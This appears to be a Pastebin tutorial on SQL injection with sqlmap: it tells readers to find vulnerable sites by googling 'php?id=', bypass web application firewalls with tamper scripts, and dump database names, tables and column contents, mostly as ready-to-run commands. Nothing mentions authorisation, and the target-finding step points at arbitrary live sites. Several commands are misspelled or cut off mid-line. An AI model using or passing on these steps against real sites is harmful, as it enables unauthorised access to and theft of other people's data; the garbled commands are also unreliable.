Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Hey 'n welcome, today we are going to SQL inject with SQLMAP
- SQL can be translated to back-end databases.
- We are going to split this into 3 sections, finding target, enumerating target and dumping target
- ##finding target
- We start by finding a URL that we can use in SQLMAP
- A wery wide way to finding dynamic link is to google "php?id="
- "www.examplefind/product.php?id=200" is an example of what type of url we wanna use
- ##enumerating target
- When we got the URL we start enumerating sql version and if is it behind WAF or not.
- If you want cheat sheet for manual checking you can find it here > http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
- But since we are working with wide dynamic links we are going to use tools.. sqlmap
- It's important to check for WAF before you do anything so open up terminal and
- sqlmap -u "www.examplefind/product.php?id=200" --identify-waf
- If it finds anything you want to google the results and get the tamper script for it like --tamper="scripthere"
- So far so good
- sqlmapp -u "www.examplefind/product.php?id=200" --tamper="scripthere" -f
- sqlmap is now trying to fingerprint so when its finish, we hopefully gets the sql version
- For higher success rate and verbose you can use this
- sqlmapp -u "www.examplefind/product.php?id=200" --tamper="scripthere" -f --random-agent --level 5 --risk 3 --time-sec=2 -v3
- ##dumping target
- Lets pretend sqlmap gave us the backend database version was 'mysql', and if we were lucky it also gaved a vulnerable parameter '<just an example' with string "<just an example" and technique b
- Now we just
- sqlmap -u "www.examplefind/product.php?id=200" --tamper="scripthere" --random-agent --level 5 --risk 3 --time-sec=2 -v3 technique=b --dbms=mysql -p host --string="Reference #9.d2453c17.1494292879.16d5435d" --dbs
- We should get all the databases names.
- For getting tables we remove --dbs with -D <databasename> and --table
- v3 technique=b --dbms=mysql -p host --string="Reference #9.d2453c17.1494292879.16d5435d" -D <databasename> --table
- and finally for getting the columns we do
- v3 technique=b --dbms=mysql -p host --string="Reference #9.d2453c17.1494292879.16d5435d" -D <databasename> -T <tablename> --columns --dump
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement